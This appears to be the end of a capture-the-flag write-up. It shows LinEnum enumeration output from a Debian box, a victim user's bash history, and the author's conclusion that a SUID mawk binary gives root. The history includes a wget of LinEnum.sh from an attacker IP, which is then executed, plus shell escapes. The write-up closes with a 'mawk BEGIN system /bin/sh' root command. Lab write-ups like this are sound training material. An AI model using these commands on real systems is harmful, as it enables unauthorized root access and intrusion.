lrwxrwxrwx 1 root root 9 Apr 8 2017 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 mountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 22 Apr 8 2017 procps.service -> systemd-sysctl.service
lrwxrwxrwx 1 root root 16 Apr 8 2017 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Apr 8 2017 reboot.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Apr 8 2017 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Apr 8 2017 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Apr 8 2017 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Apr 8 2017 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Apr 8 2017 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 Apr 8 2017 sendsigs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 stop-bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 8 2017 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Apr 8 2017 urandom.service -> systemd-random-seed.service
lrwxrwxrwx 1 root root 9 Apr 8 2017 x11-common.service -> /dev/null
-rw-r--r-- 1 root root 402 Apr 8 2017 debian-fixup.service
-rw-r--r-- 1 root root 342 Apr 8 2017 getty-static.service
-rw-r--r-- 1 root root 398 Apr 8 2017 hwclock-save.service
-rw-r--r-- 1 root root 380 Apr 8 2017 ifup@.service
-rw-r--r-- 1 root root 271 Apr 8 2017 systemd-setup-dgram-qlen.service
-rw-r--r-- 1 root root 217 Apr 8 2017 udev-finish.service
-rw-r--r-- 1 root root 770 Apr 8 2017 console-getty.service
-rw-r--r-- 1 root root 741 Apr 8 2017 console-shell.service
-rw-r--r-- 1 root root 783 Apr 8 2017 container-getty@.service
-rw-r--r-- 1 root root 1010 Apr 8 2017 debug-shell.service
-rw-r--r-- 1 root root 986 Apr 8 2017 emergency.service
-rw-r--r-- 1 root root 1.5K Apr 8 2017 getty@.service
-rw-r--r-- 1 root root 565 Apr 8 2017 halt-local.service
-rw-r--r-- 1 root root 630 Apr 8 2017 initrd-cleanup.service
-rw-r--r-- 1 root root 790 Apr 8 2017 initrd-parse-etc.service
-rw-r--r-- 1 root root 640 Apr 8 2017 initrd-switch-root.service
-rw-r--r-- 1 root root 664 Apr 8 2017 initrd-udevadm-cleanup-db.service
-rw-r--r-- 1 root root 675 Apr 8 2017 kmod-static-nodes.service
-rw-r--r-- 1 root root 473 Apr 8 2017 mail-transport-agent.target
-rw-r--r-- 1 root root 635 Apr 8 2017 quotaon.service
-rw-r--r-- 1 root root 633 Apr 8 2017 rc-local.service
-rw-r--r-- 1 root root 954 Apr 8 2017 rescue.service
-rw-r--r-- 1 root root 1.1K Apr 8 2017 serial-getty@.service
-rw-r--r-- 1 root root 653 Apr 8 2017 systemd-ask-password-console.service
-rw-r--r-- 1 root root 681 Apr 8 2017 systemd-ask-password-wall.service
-rw-r--r-- 1 root root 776 Apr 8 2017 systemd-backlight@.service
-rw-r--r-- 1 root root 1011 Apr 8 2017 systemd-binfmt.service
-rw-r--r-- 1 root root 725 Apr 8 2017 systemd-fsck-root.service
-rw-r--r-- 1 root root 678 Apr 8 2017 systemd-fsck@.service
-rw-r--r-- 1 root root 544 Apr 8 2017 systemd-halt.service
-rw-r--r-- 1 root root 501 Apr 8 2017 systemd-hibernate.service
-rw-r--r-- 1 root root 710 Apr 8 2017 systemd-hostnamed.service
-rw-r--r-- 1 root root 519 Apr 8 2017 systemd-hybrid-sleep.service
-rw-r--r-- 1 root root 480 Apr 8 2017 systemd-initctl.service
-rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-journald.service
-rw-r--r-- 1 root root 698 Apr 8 2017 systemd-journal-flush.service
-rw-r--r-- 1 root root 557 Apr 8 2017 systemd-kexec.service
-rw-r--r-- 1 root root 691 Apr 8 2017 systemd-localed.service
-rw-r--r-- 1 root root 1.2K Apr 8 2017 systemd-logind.service
-rw-r--r-- 1 root root 795 Apr 8 2017 systemd-machined.service
-rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-modules-load.service
-rw-r--r-- 1 root root 936 Apr 8 2017 systemd-networkd.service
-rw-r--r-- 1 root root 685 Apr 8 2017 systemd-networkd-wait-online.service
-rw-r--r-- 1 root root 605 Apr 8 2017 systemd-nspawn@.service
-rw-r--r-- 1 root root 553 Apr 8 2017 systemd-poweroff.service
-rw-r--r-- 1 root root 681 Apr 8 2017 systemd-quotacheck.service
-rw-r--r-- 1 root root 769 Apr 8 2017 systemd-random-seed.service
-rw-r--r-- 1 root root 841 Apr 8 2017 systemd-readahead-collect.service
-rw-r--r-- 1 root root 638 Apr 8 2017 systemd-readahead-done.service
-rw-r--r-- 1 root root 753 Apr 8 2017 systemd-readahead-replay.service
-rw-r--r-- 1 root root 548 Apr 8 2017 systemd-reboot.service
-rw-r--r-- 1 root root 824 Apr 8 2017 systemd-remount-fs.service
-rw-r--r-- 1 root root 686 Apr 8 2017 systemd-resolved.service
-rw-r--r-- 1 root root 758 Apr 8 2017 systemd-rfkill@.service
-rw-r--r-- 1 root root 475 Apr 8 2017 systemd-shutdownd.service
-rw-r--r-- 1 root root 497 Apr 8 2017 systemd-suspend.service
-rw-r--r-- 1 root root 707 Apr 8 2017 systemd-sysctl.service
-rw-r--r-- 1 root root 655 Apr 8 2017 systemd-timedated.service
-rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-timesyncd.service
-rw-r--r-- 1 root root 665 Apr 8 2017 systemd-tmpfiles-clean.service
-rw-r--r-- 1 root root 770 Apr 8 2017 systemd-tmpfiles-setup-dev.service
-rw-r--r-- 1 root root 750 Apr 8 2017 systemd-tmpfiles-setup.service
-rw-r--r-- 1 root root 826 Apr 8 2017 systemd-udevd.service
-rw-r--r-- 1 root root 823 Apr 8 2017 systemd-udev-settle.service
-rw-r--r-- 1 root root 715 Apr 8 2017 systemd-udev-trigger.service
-rw-r--r-- 1 root root 757 Apr 8 2017 systemd-update-utmp-runlevel.service
-rw-r--r-- 1 root root 821 Apr 8 2017 systemd-update-utmp.service
-rw-r--r-- 1 root root 588 Apr 8 2017 systemd-user-sessions.service
-rw-r--r-- 1 root root 497 Apr 8 2017 user@.service
-rw-r--r-- 1 root root 524 Apr 8 2017 basic.target
-rw-r--r-- 1 root root 379 Apr 8 2017 bluetooth.target
-rw-r--r-- 1 root root 394 Apr 8 2017 cryptsetup-pre.target
-rw-r--r-- 1 root root 366 Apr 8 2017 cryptsetup.target
-rw-r--r-- 1 root root 636 Apr 8 2017 dev-hugepages.mount
-rw-r--r-- 1 root root 590 Apr 8 2017 dev-mqueue.mount
-rw-r--r-- 1 root root 431 Apr 8 2017 emergency.target
-rw-r--r-- 1 root root 440 Apr 8 2017 final.target
-rw-r--r-- 1 root root 460 Apr 8 2017 getty.target
-rw-r--r-- 1 root root 490 Apr 8 2017 graphical.target
-rw-r--r-- 1 root root 487 Apr 8 2017 halt.target
-rw-r--r-- 1 root root 447 Apr 8 2017 hibernate.target
-rw-r--r-- 1 root root 468 Apr 8 2017 hybrid-sleep.target
-rw-r--r-- 1 root root 553 Apr 8 2017 initrd-fs.target
-rw-r--r-- 1 root root 526 Apr 8 2017 initrd-root-fs.target
-rw-r--r-- 1 root root 691 Apr 8 2017 initrd-switch-root.target
-rw-r--r-- 1 root root 671 Apr 8 2017 initrd.target
-rw-r--r-- 1 root root 501 Apr 8 2017 kexec.target
-rw-r--r-- 1 root root 395 Apr 8 2017 local-fs-pre.target
-rw-r--r-- 1 root root 507 Apr 8 2017 local-fs.target
-rw-r--r-- 1 root root 405 Apr 8 2017 machine.slice
-rw-r--r-- 1 root root 492 Apr 8 2017 multi-user.target
-rw-r--r-- 1 root root 464 Apr 8 2017 network-online.target
-rw-r--r-- 1 root root 461 Apr 8 2017 network-pre.target
-rw-r--r-- 1 root root 480 Apr 8 2017 network.target
-rw-r--r-- 1 root root 514 Apr 8 2017 nss-lookup.target
-rw-r--r-- 1 root root 473 Apr 8 2017 nss-user-lookup.target
-rw-r--r-- 1 root root 354 Apr 8 2017 paths.target
-rw-r--r-- 1 root root 500 Apr 8 2017 poweroff.target
-rw-r--r-- 1 root root 377 Apr 8 2017 printer.target
-rw-r--r-- 1 root root 693 Apr 8 2017 proc-sys-fs-binfmt_misc.automount
-rw-r--r-- 1 root root 603 Apr 8 2017 proc-sys-fs-binfmt_misc.mount
-rw-r--r-- 1 root root 493 Apr 8 2017 reboot.target
-rw-r--r-- 1 root root 396 Apr 8 2017 remote-fs-pre.target
-rw-r--r-- 1 root root 498 Apr 8 2017 remote-fs.target
-rw-r--r-- 1 root root 486 Apr 8 2017 rescue.target
-rw-r--r-- 1 root root 500 Apr 8 2017 rpcbind.target
-rw-r--r-- 1 root root 402 Apr 8 2017 shutdown.target
-rw-r--r-- 1 root root 362 Apr 8 2017 sigpwr.target
-rw-r--r-- 1 root root 420 Apr 8 2017 sleep.target
-rw-r--r-- 1 root root 403 Apr 8 2017 -.slice
-rw-r--r-- 1 root root 409 Apr 8 2017 slices.target
-rw-r--r-- 1 root root 380 Apr 8 2017 smartcard.target
-rw-r--r-- 1 root root 356 Apr 8 2017 sockets.target
-rw-r--r-- 1 root root 380 Apr 8 2017 sound.target
-rw-r--r-- 1 root root 441 Apr 8 2017 suspend.target
-rw-r--r-- 1 root root 353 Apr 8 2017 swap.target
-rw-r--r-- 1 root root 681 Apr 8 2017 sys-fs-fuse-connections.mount
-rw-r--r-- 1 root root 518 Apr 8 2017 sysinit.target
-rw-r--r-- 1 root root 719 Apr 8 2017 sys-kernel-config.mount
-rw-r--r-- 1 root root 662 Apr 8 2017 sys-kernel-debug.mount
-rw-r--r-- 1 root root 1.3K Apr 8 2017 syslog.socket
-rw-r--r-- 1 root root 646 Apr 8 2017 systemd-ask-password-console.path
-rw-r--r-- 1 root root 574 Apr 8 2017 systemd-ask-password-wall.path
-rw-r--r-- 1 root root 524 Apr 8 2017 systemd-initctl.socket
-rw-r--r-- 1 root root 1.1K Apr 8 2017 systemd-journald-dev-log.socket
-rw-r--r-- 1 root root 842 Apr 8 2017 systemd-journald.socket
-rw-r--r-- 1 root root 635 Apr 8 2017 systemd-readahead-done.timer
-rw-r--r-- 1 root root 555 Apr 8 2017 systemd-readahead-drop.service
-rw-r--r-- 1 root root 528 Apr 8 2017 systemd-shutdownd.socket
-rw-r--r-- 1 root root 450 Apr 8 2017 systemd-tmpfiles-clean.timer
-rw-r--r-- 1 root root 578 Apr 8 2017 systemd-udevd-control.socket
-rw-r--r-- 1 root root 575 Apr 8 2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 root root 433 Apr 8 2017 system.slice
-rw-r--r-- 1 root root 652 Apr 8 2017 system-update.target
-rw-r--r-- 1 root root 355 Apr 8 2017 timers.target
-rw-r--r-- 1 root root 395 Apr 8 2017 time-sync.target
-rw-r--r-- 1 root root 661 Apr 8 2017 tmp.mount
-rw-r--r-- 1 root root 417 Apr 8 2017 umount.target
-rw-r--r-- 1 root root 392 Apr 8 2017 user.slice
-rw-r--r-- 1 root root 366 Nov 21 2016 dbus.service
-rw-r--r-- 1 root root 106 Nov 21 2016 dbus.socket
-rw-r--r-- 1 root root 290 Dec 20 2015 rsyslog.service
-rw-r--r-- 1 root root 251 May 14 2015 cron.service
-rw-r--r-- 1 root root 283 Dec 28 2014 anacron-resume.service
-rw-r--r-- 1 root root 183 Dec 28 2014 anacron.service
-rw-r--r-- 1 root root 115 Nov 8 2014 acpid.path
-rw-r--r-- 1 root root 199 Nov 8 2014 acpid.service
-rw-r--r-- 1 root root 115 Nov 8 2014 acpid.socket
-rw-r--r-- 1 root root 169 Sep 30 2014 atd.service
/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Nov 21 2016 dbus.socket -> ../dbus.socket
/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Apr 8 2017 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Apr 8 2017 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Apr 8 2017 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 15 Nov 21 2016 dbus.service -> ../dbus.service
/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 34 Apr 8 2017 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Apr 8 2017 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 27 Apr 8 2017 systemd-shutdownd.socket -> ../systemd-shutdownd.socket
lrwxrwxrwx 1 root root 14 Nov 21 2016 dbus.socket -> ../dbus.socket
/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Mar 31 2018 forking.conf
/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 8 2017 getty-static.service -> ../getty-static.service
/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Apr 8 2017 systemd-remount-fs.service -> ../systemd-remount-fs.service
/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/runlevel1.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/runlevel2.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/runlevel3.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/runlevel4.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/runlevel5.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Apr 8 2017 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 8 2017 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 22 Apr 8 2017 udev-finish.service -> ../udev-finish.service
lrwxrwxrwx 1 root root 20 Apr 8 2017 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 23 Apr 8 2017 debian-fixup.service -> ../debian-fixup.service
lrwxrwxrwx 1 root root 22 Apr 8 2017 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Apr 8 2017 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Apr 8 2017 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Apr 8 2017 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Apr 8 2017 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Apr 8 2017 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Apr 8 2017 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Apr 8 2017 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 27 Apr 8 2017 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Apr 8 2017 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Apr 8 2017 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Apr 8 2017 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Apr 8 2017 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 30 Apr 8 2017 systemd-update-utmp.service -> ../systemd-update-utmp.service
/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Apr 8 2017 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer
/lib/systemd/system/networking.service.d:
total 4.0K
-rw-r--r-- 1 root root 84 Apr 8 2017 network-pre.conf
/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 368 Apr 8 2017 80-container-host0.network
-rw-r--r-- 1 root root 378 Apr 8 2017 80-container-ve.network
-rw-r--r-- 1 root root 73 Apr 8 2017 99-default.link
/lib/systemd/system-generators:
total 412K
-rwxr-xr-x 1 root root 46K Apr 8 2017 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-debug-generator
-rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-default-display-manager-generator
-rwxr-xr-x 1 root root 50K Apr 8 2017 systemd-fstab-generator
-rwxr-xr-x 1 root root 30K Apr 8 2017 systemd-getty-generator
-rwxr-xr-x 1 root root 70K Apr 8 2017 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root 34K Apr 8 2017 systemd-insserv-generator
-rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-rc-local-generator
-rwxr-xr-x 1 root root 26K Apr 8 2017 systemd-system-update-generator
-rwxr-xr-x 1 root root 54K Apr 8 2017 systemd-sysv-generator
/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 872 Apr 8 2017 90-systemd.preset
/lib/systemd/system-shutdown:
total 0
/lib/systemd/system-sleep:
total 0
### SOFTWARE #############################################
[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1512 Apr 15 2018 /etc/passwd
-rw-r--r-- 1 root root 759 Apr 15 2018 /etc/group
-rw-r--r-- 1 root root 761 Oct 22 2014 /etc/profile
-rw-r----- 1 root shadow 998 Apr 15 2018 /etc/shadow
[-] SUID files:
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 106908 Mar 23 2012 /usr/bin/mawk
[+] World-writable SUID files:
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
[+] World-writable SUID files owned by root:
-rwsrwxrwx 1 root root 3889608 Aug 13 2016 /usr/bin/python2.7
[-] SGID files:
-rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry
[+] Files with POSIX capabilities set:
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/bin/ping6 = cap_net_raw+ep
/bin/ping = cap_net_raw+ep
[-] Can't search *.conf files as no keyword was entered
[-] Can't search *.php files as no keyword was entered
[-] Can't search *.log files as no keyword was entered
[-] Can't search *.ini files as no keyword was entered
[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 191 Sep 7 2014 /etc/libaudit.conf
-rw-r--r-- 1 root root 2084 Mar 6 2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 24 May 17 04:21 /etc/resolv.conf
-rw-r--r-- 1 root root 2584 Feb 7 2014 /etc/gai.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 206 Aug 12 2014 /etc/idmapd.conf
-rw-r--r-- 1 root root 2969 Jun 17 2017 /etc/debconf.conf
-rw-r--r-- 1 root root 2981 Apr 15 2018 /etc/adduser.conf
-rw-r--r-- 1 root root 859 Nov 23 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 34 Apr 9 2017 /etc/ld.so.conf
-rw-r--r-- 1 root root 604 May 15 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
-rw-r--r-- 1 root root 144 Apr 15 2018 /etc/kernel-img.conf
-rw-r--r-- 1 root root 956 Dec 27 2016 /etc/mke2fs.conf
-rw-r--r-- 1 root root 7727 Apr 15 2018 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 552 Nov 12 2016 /etc/pam.conf
-rw-r--r-- 1 root root 279 Jun 13 2013 /etc/updatedb.conf
-rw-r--r-- 1 root root 9 Aug 7 2006 /etc/host.conf
-rw-r--r-- 1 root root 1260 May 26 2014 /etc/ucf.conf
-rw-r--r-- 1 root root 2632 Dec 14 2015 /etc/rsyslog.conf
-rw-r--r-- 1 root root 346 Sep 1 2014 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 3173 Jan 4 2015 /etc/reportbug.conf
[-] Current user's history files:
-rw------- 1 ted ted 1379 May 17 04:24 /home/ted/.bash_history
[-] Location and contents (if accessible) of .bash_history file(s):
/home/ted/.bash_history
ls
id
whoami
/bin/sh -i
exit
ls
cd /home
ls
cd ted
ls
cd /home
ls
sudo -l
clear
ls
which locate
locate apache2
locate apache2.conf
cd /etc/apache2/
clear
ls
cat apache2.conf
clear
ls
ps -aux | grep root
clear
cd /tmp
clear
ls
wget 192.168.43.182:8000/LinEnum.sh
ls
chmod +x LinEnum.sh
ls
./LinEnum.sh
locate www-data
ls
cd /var/www
ls
cd html
ls
cd admin
ls
cd ..
cd mail
ls
cd ..
cat post.html
clear
ls
cd /usr/sbin/rpc.idmapd
cd /usr/sbin/
ls
/usr/sbin/rpc.idmapd
cat /usr/sbin/rpc.idmapd
clear
locate http
clea
clear
cd /var/www
ls
cd html
ls
cd vendo
cd vendor/
ls
cd ,,
cd ..
clear
ls -la
cd admin
ls
cat notes.txt
ls -la
cd .. | clear
ls
cd ..
ls
cat LICENSE
cat gulpfile.js
clear
ls
cd mail
ls
cat contact_me.php
ls
cd ..
ls
cd post
cat post.html
clear
ls
cd ..
ls
cd ..
ls
cd mail
l
ls
cat www-data
cd log
cd .
cd ..
cd log
ls
cd apache2/
cd apt/
ls
cat history.log
cd ..
ls
clear
ls
cd ..
ls
cd www
ls
cd html
ls
ls-la
ls -la
clear
ls
cd in
cat index.html
clear
ls
less | strings contact.html | grep username
less | cat contact.html | grep username
less contact.html | grep username
cat package-lock.json
clear
cat package-lock.json | grep username
ls
cat README.md
clear
cd ..
cd /tmp
ls
./LinEnum.sh
cd /usr/bin/mawk
cat /usr/bin/mawk
clear
ls
awk 'BEGIN {system("/bin/sh")}'
./Line
./LinEnum.sh
cear
clear
sudo -l
mawk 'BEGIN {system("/bin/sh")}'
exit
[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root shadow 998 Apr 15 2018 /var/backups/shadow.bak
-rw------- 1 root shadow 638 Apr 15 2018 /var/backups/gshadow.bak
-rw------- 1 root root 1512 Apr 15 2018 /var/backups/passwd.bak
-rw------- 1 root root 759 Apr 15 2018 /var/backups/group.bak
[-] Any interesting mail in /var/mail:
total 12
drwxrwsr-x 2 root mail 4096 May 17 03:13 .
drwxr-xr-x 12 root root 4096 Apr 15 2018 ..
-rw-rw---- 1 www-data mail 1553 May 17 03:13 www-data
### SCAN COMPLETE ####################################SUID mawk
This is probably the vulnerability!
After searching at this site, we can type this command to get root
mawk 'BEGIN {system("/bin/sh")}'Navigate to /root to get the flag !
Congratulation!
Last updated
